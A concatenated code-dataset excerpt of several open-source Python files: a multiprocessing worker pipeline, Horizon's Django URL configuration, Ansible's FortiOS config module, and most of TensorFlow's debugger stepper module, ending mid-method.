            time.sleep(0.1)

    def join(self, timeout=None):
        # Push the sentinel so run() terminates before we join.
        self._queue.put('cmd:quit')
        super(WriteFileWorker, self).join(timeout=timeout)
class MappingWorker(multiprocessing.Process):
    """Daemon process running a pool of threads that map items from in_q
    to out_q, stamping each dict item with a 'datetime' key.

    The string 'cmd:quit' is the in-band stop sentinel for the executor
    threads; the parent requests shutdown via join().
    """

    def __init__(self, in_q, out_q, size=4, name=None):
        super(MappingWorker, self).__init__(name=name)
        # Daemonize so the worker never outlives the parent process.
        self.daemon = 1
        self.in_q = in_q
        self.out_q = out_q
        # Number of executor threads spawned inside this process.
        self.size = size
        # Set from the parent process (via join()) to request shutdown.
        self._finished = multiprocessing.Event()

    def run(self):
        print('MappingWorker start ...')
        threads = []
        for _ in xrange(self.size):
            t = threading.Thread(target=self._executor)
            t.start()
            threads.append(t)
        # Idle until the parent signals shutdown through join().
        while not self._finished.is_set():
            time.sleep(1.0)
        # One sentinel per thread so every executor wakes up and exits.
        for _ in xrange(self.size):
            self.in_q.put('cmd:quit')
        for t in threads:
            t.join()

    def _executor(self, ):
        while 1:
            param = self.in_q.get()
            # Sentinel value: stop consuming.
            if param == 'cmd:quit':
                break
            param['datetime'] = datetime.datetime.now()
            time.sleep(0.1)
            self.out_q.put(param)

    def join(self, timeout=None):
        # Signal run() to drain and stop before actually joining.
        # NOTE(review): timeout is accepted but not forwarded to the
        # parent join -- confirm whether that is intentional.
        self._finished.set()
        super(MappingWorker, self).join()
if __name__ == '__main__':
    # Pipeline: this process -> in_queue -> MappingWorker threads
    # -> out_queue -> WriteFileWorker.
    in_queue = multiprocessing.Queue(maxsize=200)
    out_queue = multiprocessing.Queue(maxsize=200)
    out_worker = WriteFileWorker(out_queue)
    out_worker.start()
    map_worker = MappingWorker(in_queue, out_queue, size=4)
    map_worker.start()
    # Feed 1000 work items; put() blocks when the queue is full, providing
    # backpressure on the producer.
    for i in xrange(1000):
        in_queue.put({'index': i})
    map_worker.join()
    out_worker.join()
| bsd-2-clause |
Mirantis/mos-horizon | horizon/site_urls.py | 7 | 1659 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
from django.conf.urls import include
from django.conf.urls import url
from django.views.generic import TemplateView # noqa
from django.views import i18n
from horizon.test.jasmine import jasmine
from horizon import views
urlpatterns = [
    url(r'^home/$', views.user_home, name='user_home')
]

# Client-side i18n URLconf: JS translation catalog, language switching,
# and the stock django.conf.urls.i18n views.
urlpatterns.extend([
    url(r'^i18n/js/(?P<packages>\S+?)/$',
        i18n.javascript_catalog,
        name='jsi18n'),
    url(r'^i18n/setlang/$',
        i18n.set_language,
        name="set_language"),
    url(r'^i18n/', include('django.conf.urls.i18n'))
])

# Jasmine test-runner URLs are only exposed in DEBUG mode.
if settings.DEBUG:
    urlpatterns.extend([
        url(r'^jasmine-legacy/$',
            TemplateView.as_view(
                template_name="horizon/jasmine/jasmine_legacy.html"),
            name='jasmine_tests'),
        url(r'^jasmine/.*?$', jasmine.dispatcher),
    ])
| apache-2.0 |
jmehnle/ansible | lib/ansible/modules/network/fortios/fortios_config.py | 50 | 5677 | #!/usr/bin/python
#
# Ansible module to manage configuration on fortios devices
# (c) 2016, Benjamin Jolivot <bjolivot@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: fortios_config
version_added: "2.3"
author: "Benjamin Jolivot (@bjolivot)"
short_description: Manage config on Fortinet FortiOS firewall devices
description:
- This module provides management of FortiOS Devices configuration.
extends_documentation_fragment: fortios
options:
src:
description:
- The I(src) argument provides a path to the configuration file
to load into the remote device.
filter:
description:
- Only for partial backup, you can restrict by giving expected configuration path (ex. firewall address).
default: ""
notes:
- This module requires pyFG python library
"""
EXAMPLES = """
- name: Backup current config
fortios_config:
host: 192.168.0.254
username: admin
password: password
backup: yes
- name: Backup only address objects
fortios_config:
host: 192.168.0.254
username: admin
password: password
backup: yes
backup_path: /tmp/forti_backup/
filter: "firewall address"
- name: Update configuration from file
fortios_config:
host: 192.168.0.254
username: admin
password: password
src: new_configuration.conf
"""
RETURN = """
running_config:
description: full config string
returned: always
type: string
change_string:
description: The commands really executed by the module
returned: only if config changed
type: string
"""
from ansible.module_utils.fortios import fortios_argument_spec, fortios_required_if
from ansible.module_utils.fortios import backup
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
#check for pyFG lib
try:
from pyFG import FortiOS, FortiConfig
from pyFG.fortios import logger
from pyFG.exceptions import CommandExecutionException, FailedCommit, ForcedCommit
HAS_PYFG=True
except:
HAS_PYFG=False
# some blocks don't support update, so remove them
NOT_UPDATABLE_CONFIG_OBJECTS=[
"vpn certificate local",
]
def main():
    """Module entry point: connect to the FortiOS device, optionally back
    up the running config, and optionally apply a configuration from
    the ``src`` file."""
    argument_spec = dict(
        src=dict(type='str', default=None),
        filter=dict(type='str', default=""),
    )
    argument_spec.update(fortios_argument_spec)

    required_if = fortios_required_if

    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        required_if=required_if,
    )

    result = dict(changed=False)

    # Fail if pyFG is not present.
    if not HAS_PYFG:
        module.fail_json(msg='Could not import the python library pyFG required by this module')

    # Define the device.
    f = FortiOS(module.params['host'],
                username=module.params['username'],
                password=module.params['password'],
                timeout=module.params['timeout'],
                vdom=module.params['vdom'])

    # Connect. Catch Exception rather than a bare except so that
    # SystemExit/KeyboardInterrupt still propagate.
    try:
        f.open()
    except Exception:
        module.fail_json(msg='Error connecting device')

    # Fetch the (possibly filtered) running config.
    try:
        f.load_config(path=module.params['filter'])
        result['running_config'] = f.running_config.to_text()
    except Exception:
        module.fail_json(msg='Error reading running config')

    # Back up the config when requested.
    if module.params['backup']:
        backup(module, f.running_config.to_text())

    # Update the config from the given file.
    if module.params['src'] is not None:
        try:
            # Read the candidate config, closing the file handle instead of
            # leaking it as the previous open().read() did.
            src_file = open(module.params['src'], 'r')
            try:
                conf_str = src_file.read()
            finally:
                src_file.close()
            f.load_config(in_candidate=True, config_text=conf_str)
        except Exception:
            module.fail_json(msg="Can't open configuration file, or configuration invalid")

        # Compute the lines that would change.
        change_string = f.compare_config()

        # Some blocks don't support update, so remove them from the diff.
        c = FortiConfig()
        c.parse_config_output(change_string)
        for o in NOT_UPDATABLE_CONFIG_OBJECTS:
            c.del_block(o)
        change_string = c.to_text()

        if change_string != "":
            result['change_string'] = change_string
            result['changed'] = True

        # Commit only when not in check mode and there is something to push.
        if module.check_mode is False and change_string != "":
            try:
                f.commit(change_string)
            except CommandExecutionException:
                e = get_exception()
                module.fail_json(msg="Unable to execute command, check your args, the error was {0}".format(e.message))
            except FailedCommit:
                e = get_exception()
                module.fail_json(msg="Unable to commit, check your args, the error was {0}".format(e.message))
            except ForcedCommit:
                e = get_exception()
                module.fail_json(msg="Failed to force commit, check your args, the error was {0}".format(e.message))

    module.exit_json(**result)


if __name__ == '__main__':
    main()
| gpl-3.0 |
ryfeus/lambda-packs | Tensorflow_OpenCV_Nightly/source/tensorflow/python/debug/lib/stepper.py | 61 | 35351 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow Debugger (tfdbg) Stepper Module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import shutil
import tempfile
import time
import six
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import ops
from tensorflow.python.ops import session_ops
# TODO(cais): Use nest.flatten once it handles nest Dicts correctly.
def _flatten_fetches(fetches):
"""Flatten list, tuple of fetches, or a single fetch into a list of fetches.
Args:
fetches: The fetches to flatten: Can be a single Tensor, Op, or a
potentially nested list, tuple or dict of such individual fetches.
Returns:
The fetches flattened to a list.
"""
flattened = []
if isinstance(fetches, (list, tuple)):
for fetch in fetches:
flattened.extend(_flatten_fetches(fetch))
elif isinstance(fetches, dict):
for key in fetches:
flattened.extend(_flatten_fetches(fetches[key]))
else:
flattened.append(fetches)
return flattened
class NodeStepper(object):
"""TensorFlow Debugger (tfdbg) stepper.
The stepper provides ability to perform "continue to" actions on a graph,
given fetch and feeds. The stepper calculates the transitive closure of the
fetch. cont() (continue to) calls can only be performed on members of the
transitive closure.
On a cont() call, the stepper performs depth-first tracing of the input
tree of the target. When it reaches an input where one of the following is
available, it will supply the available value to the feed_dict of the cont()
call:
(1) Overriding (injected) values from the client.
(2) TensorHandles from previous cont() calls.
(3) Dumped intermediate Tensors from previous cont() calls.
(4) Feeds supplied during the construction of the stepper instance.
During the cont() call, intermediate Tensors are dumped to temporary
directories. The dumped Tensor values will be used in subsequent cont() calls
when they are required as data dependencies.
The temporary directories are automatically clean when the NodeStepper
instance exits as a context mananger.
Once the tracing is complete, it will issue a run() call on the
underlying session, using the aforementioned feed_dict prepared by the input
tracing, to achieve the "continue-to" action. The above process takes into
account whether the transitive closure of an input contains Variables that
are updated during previous cont() calls on this stepper instance. If such
updates exist, we say the transitive closure is "dirty" and the stepper
can restore the "clean" state of the Variable and avoid using the
TensorHandle.
Example of basic usage:
a = tf.Variable(1.0, name="a")
b = tf.Variable(2.0, anme="b")
c = tf.add(a, b, name="c")
d = tf.multiply(a, c, name="d")
sess = tf.Session()
sess.run(tf.initialize_all_varialbes())
stepper = NodeStepper(sess, d)
stepper.cont(c) # Caches the handle to Tensor c:0.
stepper.cont(d) # Uses handle to Tensor c:0, avoiding recomputing c.
"""
# Possible types of feed used during cont() calls.
FEED_TYPE_CLIENT = "client"
FEED_TYPE_HANDLE = "handle"
FEED_TYPE_OVERRIDE = "override"
FEED_TYPE_DUMPED_INTERMEDIATE = "dumped_intermediate"
  def __init__(self, sess, fetches, feed_dict=None):
    """Constructor for Debugger.

    Args:
      sess: (Session) the TensorFlow Session to step in.
      fetches: Same as the fetches input argument to `Session.run()`.
      feed_dict: Same as the feed_dict input argument to `Session.run()`.
    """

    self._sess = sess
    self._fetches = fetches
    flattened_fetches = _flatten_fetches(fetches)

    # Parallel lists: fetch names and the corresponding graph elements.
    self._fetch_names, self._fetch_list = self._get_fetch_and_name_lists(
        flattened_fetches)

    # A map from Variable name to initializer op.
    self._variable_initializers = {}

    # A map from Variable name to initial value, used when overriding or
    # restoring Variable values.
    self._variable_initial_values = {}

    # Initialize the map for output recipients (targets).
    self._output_targets = {}

    # Sorted transitive closure of the fetched node.
    # We also collect the list of the names of the reference-type Tensors,
    # because we later need to avoid using intermediate dumps for such Tensors.
    (self._sorted_nodes,
     self._closure_elements,
     self._ref_tensor_names) = self._dfs_visit(self._sess.graph,
                                               self._fetch_list)

    self._transitive_closure_set = set(self._sorted_nodes)

    # A map from Variable name to the old values (before any cont() calls).
    self._cached_variable_values = {}

    # A cache map from tensor name to what variables may invalidate the tensor.
    self._cached_invalidation_path = {}

    # Keep track of which variables are in a dirty state.
    self._dirty_variables = set()

    # Variables updated in the last cont() call.
    self._last_updated = None

    # Cached tensor handles: a dict with keys as tensor names and values as
    # tensor handles.
    self._tensor_handles = {}

    # Cached intermediate tensor values: a dict mapping tensor names to
    # DebugTensorDatum.
    self._dumped_intermediate_tensors = {}
    # Per-instance scratch directory for intermediate dumps; removed in
    # __exit__ when used as a context manager.
    self._dump_session_root = tempfile.mkdtemp(prefix="tfdbg_stepper_")

    # Feed dict from the client.
    self._client_feed_dict = {}
    if feed_dict:
      for key in feed_dict:
        if isinstance(key, ops.Tensor):
          # Normalize Tensor keys to their string names.
          self._client_feed_dict[key.name] = feed_dict[key]
        else:
          self._client_feed_dict[key] = feed_dict[key]

    # Overriding tensor values.
    self._override_tensors = {}

    # What the feed types were used by the last cont() call.
    self._last_feed_types = {}
  def __enter__(self):
    # Context-manager entry: nothing to set up beyond __init__.
    return self
  def __exit__(self, exc_type, exc_value, exc_traceback):
    # Clean up the temporary dump directory created in __init__.
    if os.path.isdir(self._dump_session_root):
      shutil.rmtree(self._dump_session_root)
  def _get_fetch_and_name_lists(self, flattened_fetches):
    """Get the lists of fetches and their names.

    Args:
      flattened_fetches: A list of fetches or their names. Can mix fetches and
        names.

    Returns:
      (list of str): A list of the names of the fetches.
      (list): A list of the fetches.
    """
    fetch_names = []
    fetch_list = []
    for fetch in flattened_fetches:
      if isinstance(fetch, six.string_types):
        # A name was given: look up the actual element in the session graph.
        fetch_names.append(fetch)
        fetch_list.append(self._sess.graph.as_graph_element(fetch))
      else:
        # A graph element was given directly; record its name.
        fetch_names.append(fetch.name)
        fetch_list.append(fetch)

    return fetch_names, fetch_list
  def _dfs_visit(self, graph, elem_list):
    """Trace back the input of a graph element, using depth-first search.

    Uses non-recursive implementation to prevent stack overflow for deep
    graphs.

    Also performs the following action(s):
      1) When encountering a Variable, obtain its initializer op, to
         facilitate possible subsequent restoration / overriding of variable
         value.

    Args:
      graph: A TF graph instance.
      elem_list: list of graph elements: a Tensor or an Operation.

    Returns:
      (list of str) A topologically-sorted list of all nodes (not tensors)
        in the transitive closure of elem_list. Obviously, the topological
        sort is not unique in general. The return value here is just an
        arbitrary one of potentially many possible topological sorts.
      (list of str) A list of all graph elements (nodes and/or tensors) in
        the transitive closure.
      (set of str) Names of the ref-type tensors (those whose dtype is a
        reference type, e.g., direct outputs of Variables) in the closure.
    """
    # This set should hold only strings, i.e., names of the visited nodes.
    done = set()  # Keep track of visited graph elements.
    # Maps node name -> set of names of its input nodes, for nodes in the
    # transitive closure. Consumed (destroyed) by the topological sort below.
    node_inputs = dict()  # Input map of nodes in the transitive closure.
    elem_stack = copy.copy(elem_list)
    # Graph elements in the transitive closure, including the nodes and
    # tensors.
    closure_elements = [elem.name for elem in elem_list]
    ref_tensor_names = set()
    for element in elem_list:
      if isinstance(element, ops.Tensor) and element.dtype._is_ref_dtype:  # pylint: disable=protected-access
        ref_tensor_names.add(element.name)
    while elem_stack:
      curr_elem = elem_stack.pop()
      curr_node = self._get_node(curr_elem)
      done.add(curr_node.name)
      non_control_inputs = [inp for inp in curr_node.inputs]
      control_inputs = [inp for inp in curr_node.control_inputs]
      all_inputs = set(non_control_inputs + control_inputs)
      if curr_node.name not in node_inputs:
        all_input_nodes = set()
        for inp in all_inputs:
          all_input_nodes.add(self._get_node(inp).name)
        node_inputs[curr_node.name] = all_input_nodes
      # Iterate through all inputs (data and control inputs alike).
      for inp in all_inputs:
        # Record the reverse edge: inp feeds into curr_elem. This output map
        # is later used by _invalidate_transitively_outgoing_cache().
        if inp.name not in self._output_targets:
          self._output_targets[inp.name] = set([curr_elem.name])
        else:
          self._output_targets[inp.name].add(curr_elem.name)
        if (isinstance(inp, ops.Tensor) and
            inp.op.type in ["Variable", "VariableV2"] and
            inp.name not in self._variable_initializers):
          # Obtain the initializer op of the variable, in case the Variable's
          # value needs to be restored later.
          initializer = graph.as_graph_element(inp.op.name + "/Assign")
          self._variable_initializers[inp.name] = initializer
          self._variable_initial_values[inp.name] = initializer.inputs[1]
        inp_node = self._get_node(inp)
        if inp_node.name in done:
          # Already visited.
          continue
        elem_stack.append(inp)
        closure_elements.append(inp.name)
        if isinstance(inp, ops.Tensor) and inp.dtype._is_ref_dtype:  # pylint: disable=protected-access
          ref_tensor_names.add(inp.name)
    # Now that we have traversed the transitive closure and obtained the
    # node-input map, we can topologically sort them (Kahn-style: repeatedly
    # emit nodes whose set of unprocessed inputs has become empty).
    sorted_nodes = []
    stack = []
    for node in node_inputs:
      if not node_inputs[node]:
        stack.append(node)
    for node in stack:
      del node_inputs[node]
    while stack:
      curr_node = stack.pop()
      sorted_nodes.append(curr_node)
      # Iterate through the node-input map and remove the child.
      pushes = []
      for node in node_inputs:
        if curr_node in node_inputs[node]:
          node_inputs[node].remove(curr_node)
          if not node_inputs[node]:
            pushes.append(node)
      # Delete new pushes from node-input map.
      for node in pushes:
        del node_inputs[node]
      stack.extend(pushes)
    return sorted_nodes, closure_elements, ref_tensor_names
  def sorted_nodes(self):
    """Get a topologically-sorted list of node names of the stepper.

    These are the names of the nodes (i.e., not Tensors) in the transitive
    closure of the stepper, in a topologically-sorted order.

    Returns:
      (list of str) Sorted transitive inputs to the fetch of the stepper
        instance. The fetch itself is included in the list.
    """
    return self._sorted_nodes
  def closure_elements(self):
    """Get a name list of the graph elements of the stepper.

    Returns:
      (list of str) Names of the graph elements (i.e., nodes and tensors) in
        the transitive closure of the stepper, in no particular order.
    """
    return self._closure_elements
def output_slots_in_closure(self, node_name):
"""Get the output tensors in the transitive closure from node.
Args:
node_name: (str) Name of the node in question.
Returns:
(list of int) Output slots of the output tensors of the node that are in
the transitive closure of the stepper.
"""
node = self._sess.graph.as_graph_element(node_name)
tensor_slots = []
for i, _ in enumerate(node.outputs):
tensor_name = node_name + ":%d" % i
if tensor_name in self._closure_elements:
tensor_slots.append(i)
return tensor_slots
def is_feedable(self, name):
"""Determine if a graph element if feedable.
Args:
name: (str) name of the graph element (Tensor or Operation)
Returns:
(bool) whether the graph element is feedable.
"""
if not isinstance(name, six.string_types):
raise TypeError("Expected type str; got type %s" % type(name))
elem = self._sess.graph.as_graph_element(name)
return self._sess.graph.is_feedable(elem)
def override_tensor(self, tensor_name, overriding_val):
"""Override the value of a tensor.
Args:
tensor_name: (str) Name of the tensor to override.
overriding_val: (numpy.ndarray) Overriding tensor value.
Raises:
ValueError: If tensor_name does not correspond to a tensor in the input
tree to the fetched graph element of this stepper instance.
"""
if not isinstance(tensor_name, six.string_types):
raise TypeError("Expected type str; got type %s" % type(tensor_name))
node_name = self._get_node_name(tensor_name)
if node_name not in self._transitive_closure_set:
raise ValueError(
"Cannot override tensor \"%s\" because it does not exist in the "
"input tree to the fetch \"%s\"" %
(tensor_name, repr(self._fetch_names)))
self._override_tensors[tensor_name] = overriding_val
# Invalidate cache by tracing outputs.
self._invalidate_transitively_outgoing_cache(tensor_name)
def remove_override(self, tensor_name):
"""Remove the overriding value on a tensor.
Args:
tensor_name: (str) name of the tensor to remove the overriding value
from.
Raises:
ValueError: If no overriding value exists for tensor_name.
"""
if tensor_name not in self._override_tensors:
raise ValueError("No overriding value exists for tensor \"%s\"." %
tensor_name)
del self._override_tensors[tensor_name]
# Invalidate cache by tracing outputs.
self._invalidate_transitively_outgoing_cache(tensor_name)
  def last_feed_types(self):
    """Obtain information about the feeds used in the last cont() call.

    Returns:
      (dict) A dict mapping tensor names to feed types (the FEED_TYPE_*
        values assigned during cont(): client feed, cached handle, dumped
        intermediate, or override).
    """
    return self._last_feed_types
  def cont(self,
           target,
           use_tensor_handles=True,
           use_dumped_intermediates=True,
           use_overrides=True,
           invalidate_from_updated_variables=False,
           restore_variable_values=False):
    """Continue till the completion of the specified target tensor.

    Args:
      target: A single fetched Tensor or Op, or a name (str) representing the
        Tensor or Op. In the case of a name str, the graph will be searched
        to find the corresponding Tensor or Op.
        # TODO(cais): Support multiple fetches as in Session.run() interface.
      use_tensor_handles: (bool) Whether this cont() run will use cached tensor
        handles to avoid recomputation. Default: True.
      use_dumped_intermediates: (bool) Whether this cont() call will use dumped
        intermediate tensors to avoid recomputation.
      use_overrides: (bool) Whether the overriding tensor values supplied by
        the client are to be used in this cont() call. Default: True.
      invalidate_from_updated_variables: (bool) Whether to invalidate the
        tensor handles and intermediate tensor handles affected by the
        Variable updates that happen in this cont() call.
      restore_variable_values: (bool) Whether the old values of the variables
        (before any cont() calls in this object) are to be restored.

    Returns:
      Value from Session.run() of the target.

    Raises:
      ValueError: If the target is specified as a string and the string does
        not correspond to any tensors in the Session graph.
        Or if the target of this cont() is not in the input list of the
        Stepper object's target.
        Or if target is a Placeholder.
    """
    self._last_feed_types = {}
    if isinstance(target, six.string_types):
      # Fetch target is a string. Assume it is the name of the Tensor or Op and
      # will attempt to find it in the Session's graph.
      target_name = target
    else:
      target_name = target.name
    graph_element = self._sess.graph.as_graph_element(target_name)
    # Any additional tensor handles to obtain in this cont() action.
    additional_handle_requests = []
    # Placeholder targets short-circuit: their value always comes from the
    # client feed dict, never from a Session.run().
    if (isinstance(graph_element, ops.Tensor) and
        graph_element.op.type == "Placeholder"):
      self._last_feed_types[graph_element.name] = self.FEED_TYPE_CLIENT
      return self._client_feed_dict[graph_element.name]
    elif (isinstance(graph_element, ops.Operation) and
          graph_element.type == "Placeholder"):
      tensor_name = graph_element.name + ":0"
      self._last_feed_types[tensor_name] = self.FEED_TYPE_CLIENT
      return self._client_feed_dict[tensor_name]
    if isinstance(graph_element, ops.Operation) and graph_element.outputs:
      # Check if this op has any output tensors that also fall into this
      # stepper's transitive closure.
      node_outputs = [
          output.name for output in graph_element.outputs
          if output.name in self._closure_elements
      ]
      if node_outputs:
        # The target is an op with at least one output within the transitive
        # closure. The cont() action will amount to using the 0-th
        # output Tensor as the target, as well as obtaining handles to it
        # and to the rest of the outputs tensors in the transitive closure
        # (if any).
        target_name = node_outputs[0]
        additional_handle_requests = node_outputs[1:]
    # Verify that the target is in the transitive closure of the stepper's
    # fetch.
    target_node_name = self._get_node_name(target_name)
    if target_node_name not in self._transitive_closure_set:
      raise ValueError(
          "Target \"%s\" is not in the transitive closure for the fetch of the "
          "stepper: \"%s\"." % (target_name, repr(self._fetch_names)))
    # Check if a cached tensor handle can be used on the fetch directly.
    if use_tensor_handles and target_name in self._tensor_handles:
      self._last_feed_types[target_name] = self.FEED_TYPE_HANDLE
      return self._tensor_handles[target_name].eval()
    # Check if a dumped intermediate tensor can be used on the fetch directly.
    if (use_dumped_intermediates and
        target_name in self._dumped_intermediate_tensors):
      self._last_feed_types[target_name] = self.FEED_TYPE_DUMPED_INTERMEDIATE
      return self._dumped_intermediate_tensors[target_name].get_tensor()
    # Check if an overriding tensor value can be used directly.
    if use_overrides and target_name in self._override_tensors:
      # Override is available. Return the value right away.
      self._last_feed_types[target_name] = self.FEED_TYPE_OVERRIDE
      return self._override_tensors[target_name]
    # Keep track of which variables are restored in this cont() call.
    restored_variables = set()
    # Keep track of which variables are "touched" (i.e., possibly updated) in
    # this cont() call.
    self._last_updated = set()
    # =========================================================================
    # Use a non-recursive method to trace the inputs from the node and set up
    # the feeds.
    feeds = {}  # The feeds to be used in the Session.run() call.
    fetched = self._sess.graph.as_graph_element(target_name)
    elem_stack = [fetched]
    done = set()
    while elem_stack:
      curr_elem = elem_stack.pop()
      curr_node = self._get_node(curr_elem)
      done.add(curr_node.name)
      non_control_inputs = [inp for inp in curr_node.inputs]
      control_inputs = [inp for inp in curr_node.control_inputs]
      all_inputs = set(non_control_inputs + control_inputs)
      # Iterate through all inputs (data and control inputs alike).
      for inp in all_inputs:
        # Determine whether the input is feedable. Reference-type tensors,
        # e.g., Variables, should not be fed, because they can change.
        if isinstance(inp, ops.Tensor):
          is_inp_ref = inp.dtype._is_ref_dtype  # pylint: disable=protected-access
          can_feed = self._sess.graph.is_feedable(inp) and not is_inp_ref
        else:
          is_inp_ref = False
          can_feed = False
        if (restore_variable_values and inp.name in self._dirty_variables and
            inp.name not in restored_variables and
            inp.name not in self._last_updated):
          # Do not restore Variables touched or restored previously in this
          # cont() call.
          initializer_op = self._variable_initializers[inp.name]
          initial_value_tensor = self._variable_initial_values[inp.name]
          self._sess.run(initializer_op,
                         feed_dict={
                             initial_value_tensor:
                                 self._cached_variable_values[inp.name]
                         })
          # Mark the variable as restored.
          restored_variables.add(inp.name)
        # Determine if this is a reference-type input from a variable, and
        # the recipient node is not Identity. In that case, the Variable
        # needs to be marked as dirty and its current value recorded, due to
        # the fact that the receiving op may mutate the value of the Variable.
        if (is_inp_ref and inp.op.type in ["Variable", "VariableV2"] and
            curr_node.type != "Identity"):
          # Mark the variable as dirty.
          self._last_updated.add(inp.name)
          # Obtain the old value of the variable and cache it.
          if inp.name not in self._cached_variable_values:
            old_value = self._sess.run(inp)
            self._cached_variable_values[inp.name] = old_value
        # N.B.: The order of the logical branches matters. For example,
        # _client_feed_dict comes after _tensor_handles, so that tensor
        # handles stored in cont() calls can override the original client
        # feeds. Also for example, _override_tensors comes the first, so
        # the manual overriding, if exists, can always take effect.
        if use_overrides and can_feed and inp.name in self._override_tensors:
          # Use client-supplied overriding tensor value.
          feeds[inp] = self._override_tensors[inp.name]
          self._last_feed_types[inp.name] = self.FEED_TYPE_OVERRIDE
        elif (can_feed and inp not in feeds and
              use_tensor_handles and inp.name in self._tensor_handles):
          # Tensor handle found in cache.
          feeds[inp] = self._tensor_handles[inp.name]
          self._last_feed_types[inp.name] = self.FEED_TYPE_HANDLE
        elif (can_feed and inp not in feeds and
              use_dumped_intermediates and
              inp.name in self._dumped_intermediate_tensors):
          # Dumped intermediate Tensor found.
          feeds[inp] = self._dumped_intermediate_tensors[inp.name].get_tensor()
          self._last_feed_types[inp.name] = self.FEED_TYPE_DUMPED_INTERMEDIATE
        elif inp.name in self._client_feed_dict:
          # This input is available in the client feed_dict.
          feeds[inp] = self._client_feed_dict[inp.name]
          self._last_feed_types[inp.name] = self.FEED_TYPE_CLIENT
        else:
          # There is no feed available for this input. So keep tracing its
          # input(s).
          inp_node = self._get_node(inp)
          if inp_node.name in done:
            # Already visited.
            continue
          elem_stack.append(inp)
          done.add(inp_node.name)
    # =========================================================================
    # Commit the dirty/restored bookkeeping accumulated during the traversal.
    if self._last_updated:
      self._dirty_variables.update(self._last_updated)
    for variable in restored_variables:
      self._dirty_variables.remove(variable)
    (dump_path,
     run_options) = self._prepare_cont_call_dump_path_and_run_options()
    if isinstance(fetched, ops.Operation):
      # The fetched is an Operation: Will not get tensor handle.
      self._sess.run(fetched, feed_dict=feeds, options=run_options)
      return_value = None
    else:
      # This is a Tensor: Will get tensor handle and cache it.
      # Will also get the additional requested tensor handles (if any).
      tensors_to_get_handles_for = [fetched]
      handle_names = [target_name]
      tensors_to_get_handles_for.extend([
          self._sess.graph.as_graph_element(h)
          for h in additional_handle_requests
      ])
      handle_names.extend(additional_handle_requests)
      handles = self._sess.run(
          [session_ops.get_session_handle(tensor) for tensor in
           tensors_to_get_handles_for],
          feed_dict=feeds,
          options=run_options)
      for handle_name, handle in zip(handle_names, handles):
        self._tensor_handles[handle_name] = handle
      return_value = self._tensor_handles[target_name].eval()
    self._load_dumped_intermediate_tensors(dump_path, target_name)
    if invalidate_from_updated_variables:
      # Invalidate caches at the end.
      for last_updated_variable in self._last_updated:
        self._invalidate_transitively_outgoing_cache(last_updated_variable)
    return return_value
def _prepare_cont_call_dump_path_and_run_options(self):
"""Prepare the dump path and RunOptions for next cont() call.
Returns:
dump_path: (str) Directory path to which the intermediate tensor will be
dumped.
run_options: (config_pb2.RunOptions) The RunOptions containing the tensor
watch options for this graph.
"""
run_options = config_pb2.RunOptions()
dump_path = self._cont_call_dump_path()
for element_name in self._closure_elements:
if ":" in element_name:
debug_utils.add_debug_tensor_watch(
run_options,
debug_data.get_node_name(element_name),
output_slot=debug_data.get_output_slot(element_name),
debug_urls=["file://" + dump_path])
return dump_path, run_options
def _cont_call_dump_path(self):
return os.path.join(self._dump_session_root,
"cont_%d" % int(time.time() * 1e6))
def _load_dumped_intermediate_tensors(self, dump_path, target_name):
dump_dir = debug_data.DebugDumpDir(dump_path, validate=False)
for dump in dump_dir.dumped_tensor_data:
if (dump.tensor_name not in self._ref_tensor_names and
dump.tensor_name not in self._tensor_handles and
dump.tensor_name not in self._override_tensors and
dump.tensor_name != target_name):
self._dumped_intermediate_tensors[dump.tensor_name] = dump
def _get_node_name(self, graph_element_name):
return graph_element_name.split(":")[0]
  def _invalidate_transitively_outgoing_cache(self, source_element):
    """Invalidate the cached tensor handles by tracing output.

    This method is used to invalidate caches such as cached TensorHandles
    and intermediate tensor values when Variable mutation happens or when
    client overrides tensor values.

    Uses non-recursive implementation to avoid stack overflow on deep
    networks.

    Args:
      source_element: The source graph element (e.g., a Variable output slot)
        to trace the output from.
    """
    # Nothing is cached: nothing to invalidate.
    if not self._tensor_handles and not self._dumped_intermediate_tensors:
      return
    # First, use cached invalidation paths to eliminate some cached tensor
    # handles and intermediate tensors.
    to_delete_handles = []
    for handle_name in self._tensor_handles:
      if (handle_name in self._cached_invalidation_path and
          source_element in self._cached_invalidation_path[handle_name]):
        to_delete_handles.append(handle_name)
    for handle_name in to_delete_handles:
      del self._tensor_handles[handle_name]
    to_delete_intermediates = []
    for intm_tensor_name in self._dumped_intermediate_tensors:
      if (intm_tensor_name in self._cached_invalidation_path and
          source_element in self._cached_invalidation_path[intm_tensor_name]):
        to_delete_intermediates.append(intm_tensor_name)
